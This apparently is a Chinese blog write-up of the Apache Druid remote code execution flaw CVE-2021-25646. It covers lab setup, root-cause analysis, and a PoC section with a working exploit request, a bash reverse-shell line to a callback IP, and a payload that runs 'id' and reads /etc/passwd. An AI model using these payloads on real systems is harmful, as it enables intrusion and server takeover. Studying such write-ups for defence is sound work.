Apache Druid远程代码执行漏洞[CVE-2021-25646]

最新推荐文章于 2024-05-26 08:32:52 发布
最新推荐文章于 2024-05-26 08:32:52 发布
阅读量682 收藏 1
点赞数
分类专栏: java Web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/113506447
版权
安全 同时被 3 个专栏收录
264 篇文章 9 订阅
订阅专栏
Web
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

漏洞描述

虽然官方描述是需要登录,但是这个认证机制默认并没有开启,所以相当于是默认情况下的RCE。

环境搭建

wget https://mirrors.bfsu.edu.cn/apache/druid/0.19.0/apache-druid-0.19.0-bin.tar.gz
tar zxf apache-druid-0.19.0-bin.tar.gz
cd apache-druid-0.19.0
bin/start-micro-quickstart
# 停止直接CTRL+C即可

修改端口在:

conf/druid/single-server/micro-quickstart/router/runtime.properties

将默认的8888改为其他端口。
启动这个micro的时候默认会在2181启动zookeeper,修改配置:

vi conf/zk/zoo.cfg

如果其他应用占用了2181端口,而你将这个druid自带的zookeeper变成了其他端口,则需要在启动之前添加一个变量:

export DRUID_SKIP_PORT_CHECK=1

还有其他组件由于被占用了默认端口,导致退出了,修改默认端口:

[cqq@localhost micro-quickstart]$ grep -rn "druid.plaintextPort" *
broker/runtime.properties:21:druid.plaintextPort=8082
coordinator-overlord/runtime.properties:21:druid.plaintextPort=8081
historical/runtime.properties:21:druid.plaintextPort=8083
middleManager/runtime.properties:21:druid.plaintextPort=8091
router/runtime.properties:21:druid.plaintextPort=8889
[cqq@localhost micro-quickstart]$ pwd
/home/cqq/repos/apache-druid-0.19.0/conf/druid/single-server/micro-quickstart

修改端口之前,其他组件启动失败,打开界面为:
在这里插入图片描述

成功启动其他组件之后,
端口监听情况:
在这里插入图片描述
界面情况:
在这里插入图片描述

调试配置:

vi apache-druid-0.19.0/conf/druid/single-server/micro-quickstart/coordinator-overlord/jvm.config

在最后一行添加:

-Xrunjdwp:transport=dt_socket,suspend=n,server=y,address=12346

分析

默认情况下执行用户提供的js代码是禁止的:
在这里插入图片描述

这里利用

"": {"enabled": true}

将JavaScriptConfig对象的enable属性值设置为true,覆盖系统默认的false,开启了js执行功能。

在这里插入图片描述

然后就是js调Java代码的流程了。
在这里插入图片描述

PoC

POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.85.130:8888
Content-Type: application/json;charset=utf-8
Content-Length: 587
Connection: close


{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"timestamp\":\"2020-12-12T12:10:21.040Z\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "test", "function": "function(value) {java.lang.Runtime.getRuntime().exec('calc')}", "": {"enabled": true}}}}}}

反弹shell改成:

/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.85.1/7777 0>&1

回显:

{
  "type": "index",
  "spec": {
    "ioConfig": {
      "type": "index",
      "firehose": {
        "type": "local",
        "baseDir": "/etc",
        "filter": "passwd"
      }
    },
    "dataSchema": {
      "dataSource": "%%DATASOURCE%%",
      "parser": {
        "parseSpec": {
          "format": "javascript",
          "timestampSpec": {},
          "dimensionsSpec": {},
          "function": "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"2013-09-01T12:41:27Z\",test: s}}",
          "": {
            "enabled": "true"
          }
        }
      }
    }
  }
}

参考

  • https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiw
  • https://seclists.org/oss-sec/2021/q1/87
  • https://druid.apache.org/docs/latest/tutorials/index.html
  • https://github.com/apache/druid/issues/2434
  • https://druid.apache.org/docs/latest/operations/api-reference.html#broker
caiqiiqi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
druid玩玩
u013009809的专栏
05-13 223
1.druid 有单机和集群模式,单机又分不同的模式匹配不同的服务器资源 ,启动的时候报2181端口已经被占用,按照提示export DRUID_SKIP_PORT_CHECK=1就好了 2.单机模式下Druid服务一起运行单个ZK实例。也可以选择单独部署ZK。怎么配置外部zk实例呢?首先将/conf/supervise/single-server/micro-quickstart.conf中...
Apache Druid 远程代码执行漏洞(CVE-2021-26919)
RAFANra的博客
03-30 1324
Apache Druid 远程代码执行漏洞(CVE-2021-26919) 漏洞名称 : Apache Druid 远程代码执行漏洞(CVE-2021-26919) 组件名称 : Apache Druid 影响范围 : Apache Druid <0.20.2 漏洞类型 : 远程代码执行 利用条件 : 1、用户认证:不需要用户认证 2、触发方式:远程 造成后果 : 允许未经身份验证的攻击者执行任意代码2021年3月30日,深信服安全团队监测到一则组件存在 Apache Druid远程代码执行漏洞
Druid未授权漏洞进一步的利用
最新发布
qq_53058639的博客
05-26 622
对于druid未授权,大多数白帽子在做测试的时候都是当作一个低危的信息泄露来处理,但是其实如果利用条件都达成了,运气够好的话,造成的危害还是不小的。这也告诉我们以后碰到这种未授权漏洞,可以多收集一些信息,扩宽一下测试思路,说不定就能获得更大的收获。
SpringBoot实战教程(6)| 整合Druid
猿小白的博客
12-10 2614
Apache Druid是一个实时分析型数据库,旨在对大型数据集进行快速的查询分析("OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景,同时,Druid也通常被用来助力分析型应用的图形化界面,或者当做需要快速聚合的高并发后端API,Druid最适合应用于面向事件类型的数据。 目录 一、主要特征 二、使用场景 三、初始化SpringBoot项目 四、引入依赖文件 五、编写配置文件 六、编写DruidConfig配置类 七、查看Druid..
X-ray捡洞中遇到的高频漏洞(Shiro默认key、备份文件&敏感目录泄露、Druid未授权访问、phpstudy-nginx解析漏洞、dedecms-cve-2018-6910)
Love&Share
11-10 9410
用 X-Ray 刷洞发现一些出现频率高的漏洞,把漏洞原理和利用方式稍作整理,按照危害排名,低危漏洞可以收集一些信息然后深度利用变高危 文章目录直接利用Shiro默认keySql注入备份文件&敏感目录泄露Druid未授权访问XSS有条件利用phpstudy-nginx解析漏洞dedecms-cve-2018-6910鸡肋Apache Tomcat Examples未删除go-pprof资源监控信息泄露ELSE配置xray反连360提交漏洞 直接利用 Shiro默认key Xray提示:shiro/s.
Apache Druid远程代码执行漏洞(CVE-2021-25646)
weixin_44047654的博客
12-05 1718
Apache Druid远程代码执行漏洞(CVE-2021-25646)
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
【技术分享】CVE-2021-25646 Apache Druid 远程代码执行漏洞分析 .pdf
09-05
Apache Druid CVE-2021-25646 远程代码执行漏洞深度解析》 Apache Druid,作为一个高性能、列式存储的开源分布式数据存储系统,广泛应用于商业智能和OLAP(在线分析处理)场景,以处理大量实时和历史数据。然而,...
Apache Druid远程代码执行漏洞响应通告
05-05
Apache Druid远程代码执行漏洞响应通告
Apache Druid LoadData 任意文件读取漏洞
bqnagus
09-29 546
Apache Druid LoadData 任意文件读取漏洞,由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露
Apache Durid(入门 安装 数据摄取 查询 集成SpringBoot)
m0_46690280的博客
08-21 1957
Apache DuridApache Durid1. Durid概述1.1 为什么使用1.1.1 云原生数据库1.1.2 轻松集成1.1.3 超高性能1.1.4 工作流1.1.5 多种部署方式1.2 使用场景1.2.1 常见的使用场景1.2.1.1 用户活动和行为1.2.1.2 网络流1.2.1.3 数字营销1.2.1.4 应用性能管理1.2.1.5 物联网和设备指标1.2.1.6 OLAP和商业智能1.2.2 适合的场景1.2.3 不适合的场景2. Durid是什么2.1 主要特性2.3 和其他技术对比
Goby 漏洞发布|Apache Druid Kafka Connect 远程代码执行漏洞CVE-2024-25194)_druid kafka漏洞
2301_82243100的博客
04-15 455
它设计用于处理大规模的实时数据,并提供快速的交互式查询和分析。Apache Druid 使用了存在漏洞的 Kafka Connect,攻击者可访问Kafka Connect Worker,且可以创建或修改连接器时,通过设置sasl.jaas.config属性为恶意类,进而可导致JNDI注入漏洞,可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
安装 Druid 安装的时候提示 JAVA 版本的问题
HONEY MOOSE
07-29 408
错误信息如下 yhu@YuCheng-Hu:~/apache-druid-0.21.1/bin$ ./start-nano-quickstart Druid only officially supports Java 8. Any Java version later than 8 is still experimental. Your current version is: 11.0.11. If you believe this check is in error or you still wan
Apache Druid命令执行漏洞复现
weixin_53696027的博客
06-02 532
CVE-2019-25646是由由阿里云安全发现的 Apache Druid 远程代码执行漏洞
Apache Druid简介
你的世界是你创造的结果
11-16 1165
Apache Druid简介 什么是德鲁伊? Apache Druid是一个实时分析数据库,旨在对大型数据集进行快速的切片和切分分析(“ OLAP ”查询)。德鲁伊最常用作数据库,以支持对实时摄取,快速查询性能和高正常运行时间很重要的用例。因此,Druid通常用于为分析应用程序的GUI供电,或用作需要快速聚合的高并发API的后端。德鲁伊最适合面向事件的数据。 德鲁伊的常见应用领域包括: 点击流分析(网络和移动分析) 网络遥测分析(网络性能监控) 服务器指标存储 供应链分析(制造指标) 应用程序性能指标 数字
Alibaba Druid未授权访问漏洞记录(敏感目录,端口:不确定)
热门推荐
墨痕诉清风的博客
11-12 1万+
1.Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池.2.Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控.
Apache Druid rce漏洞
04-27
2021年5月,Apache Druid官方发布了一份安全公告,称该软件存在一个高风险的远程代码执行RCE漏洞,该漏洞可能导致攻击者可以通过恶意负载文件执行任意代码,甚至可能完全控制受影响的系统。建议用户及时升级到受...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值